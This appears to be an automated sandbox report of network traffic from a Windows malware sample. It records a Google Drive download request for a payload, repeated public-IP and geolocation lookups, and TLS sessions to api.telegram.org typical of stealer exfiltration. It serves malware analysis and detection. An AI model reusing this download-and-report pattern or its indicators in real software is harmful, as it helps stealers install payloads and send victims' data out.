                                                                                                        Jan 11, 2025 07:40:05.844739914 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:05.848587036 CET8050006132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:05.848661900 CET5000680192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:05.849543095 CET8050015132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:05.849625111 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:05.849704027 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:05.854574919 CET8050015132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:10.593808889 CET8050015132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:10.596463919 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:10.596518993 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:10.596595049 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:10.597245932 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:10.597261906 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:10.633572102 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.211114883 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.213293076 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:11.213314056 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.213376045 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:11.213385105 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.469649076 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.469847918 CET44350016149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.469935894 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:11.470326900 CET50016443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:11.473696947 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.474947929 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.478734016 CET8050015132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.478807926 CET5001580192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.479878902 CET8050017132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:11.479965925 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.480046988 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:11.484958887 CET8050017132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:16.771871090 CET8050017132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:16.774588108 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:16.774648905 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:16.774722099 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:16.775137901 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:16.775158882 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:16.821088076 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.383366108 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.385323048 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:17.385361910 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.385530949 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:17.385544062 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.817502975 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.817724943 CET44350018149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.817821026 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:17.818320990 CET50018443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:17.822247028 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.822870016 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.827338934 CET8050017132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.827446938 CET5001780192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.827784061 CET8050019132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:17.827876091 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.827970982 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:17.832878113 CET8050019132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:22.958065033 CET8050019132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:23.008629084 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:23.073966980 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:23.078876972 CET8050020132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:23.082088947 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:23.082222939 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:23.086999893 CET8050020132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:24.370826960 CET8050020132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:24.372298002 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:24.372348070 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:24.372358084 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:24.372410059 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:24.372735977 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:24.372747898 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:24.377460957 CET8050019132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:24.377562046 CET5001980192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:24.414936066 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:24.995517015 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:25.035506010 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:27.919445038 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:27.919471025 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:27.919538021 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:27.919544935 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:28.478215933 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:28.478329897 CET44350021149.154.167.220192.168.2.4
                                                                                                        Jan 11, 2025 07:40:28.478399992 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:28.478838921 CET50021443192.168.2.4149.154.167.220
                                                                                                        Jan 11, 2025 07:40:28.481694937 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:28.482701063 CET5002280192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:28.486807108 CET8050020132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:28.486890078 CET5002080192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:28.487605095 CET8050022132.226.8.169192.168.2.4
                                                                                                        Jan 11, 2025 07:40:28.487679005 CET5002280192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:28.487767935 CET5002280192.168.2.4132.226.8.169
                                                                                                        Jan 11, 2025 07:40:28.492638111 CET8050022132.226.8.169192.168.2.4
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 11, 2025 07:39:41.169106960 CET5014153192.168.2.41.1.1.1
                                                                                                        Jan 11, 2025 07:39:41.279591084 CET53501411.1.1.1192.168.2.4
                                                                                                        Jan 11, 2025 07:39:42.361627102 CET5223553192.168.2.41.1.1.1
                                                                                                        Jan 11, 2025 07:39:42.368859053 CET53522351.1.1.1192.168.2.4
                                                                                                        Jan 11, 2025 07:39:46.704070091 CET6231553192.168.2.41.1.1.1
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET53623151.1.1.1192.168.2.4
                                                                                                        Jan 11, 2025 07:39:48.110366106 CET5916553192.168.2.41.1.1.1
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET53591651.1.1.1192.168.2.4
                                                                                                        Jan 11, 2025 07:39:54.628595114 CET5905953192.168.2.41.1.1.1
                                                                                                        Jan 11, 2025 07:39:54.635695934 CET53590591.1.1.1192.168.2.4
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 11, 2025 07:39:41.169106960 CET192.168.2.41.1.1.10x13b9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:42.361627102 CET192.168.2.41.1.1.10x8d01Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.704070091 CET192.168.2.41.1.1.10x28a7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.110366106 CET192.168.2.41.1.1.10xb401Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:54.628595114 CET192.168.2.41.1.1.10x2d80Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 11, 2025 07:39:41.279591084 CET1.1.1.1192.168.2.40x13b9No error (0)drive.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:42.368859053 CET1.1.1.1192.168.2.40x8d01No error (0)drive.usercontent.google.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:46.711347103 CET1.1.1.1192.168.2.40x28a7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:48.119493008 CET1.1.1.1192.168.2.40xb401No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 11, 2025 07:39:54.635695934 CET1.1.1.1192.168.2.40x2d80No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                        • drive.google.com
                                                                                                        • drive.usercontent.google.com
                                                                                                        • reallyfreegeoip.org
                                                                                                        • api.telegram.org
                                                                                                        • checkip.dyndns.org
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449921132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:39:46.721379042 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:39:47.558394909 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:47 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 11, 2025 07:39:47.566066980 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:39:47.848217964 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:47 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                        Jan 11, 2025 07:39:54.321516991 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:39:54.620425940 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:54 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.449977132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:39:56.103481054 CET127OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Jan 11, 2025 07:39:56.943947077 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:56 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.449991132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:39:57.877127886 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:39:58.911942005 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:39:58 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.450006132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:39:59.810326099 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:40:04.982192993 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:40:04 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.450015132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:40:05.849704027 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:40:10.593808889 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:40:10 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.450017132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:40:11.480046988 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:40:16.771871090 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:40:16 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.450019132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:40:17.827970982 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:40:22.958065033 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                        Date: Sat, 11 Jan 2025 06:40:22 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 557
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                                                        Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.450020132.226.8.169807856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:40:23.082222939 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 11, 2025 07:40:24.370826960 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Sat, 11 Jan 2025 06:40:24 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        8192.168.2.450022132.226.8.16980
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 11, 2025 07:40:28.487767935 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.449890216.58.206.464437856C:\Users\user\Desktop\c7WJL1gt32.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-11 06:39:42 UTC216OUTGET /uc?export=download&id=1bncLeLVnb6OXPt4SnyT95T-ITWrz3Wd8 HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Host: drive.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2025-01-11 06:39:42 UTC1920INHTTP/1.1 303 See Other
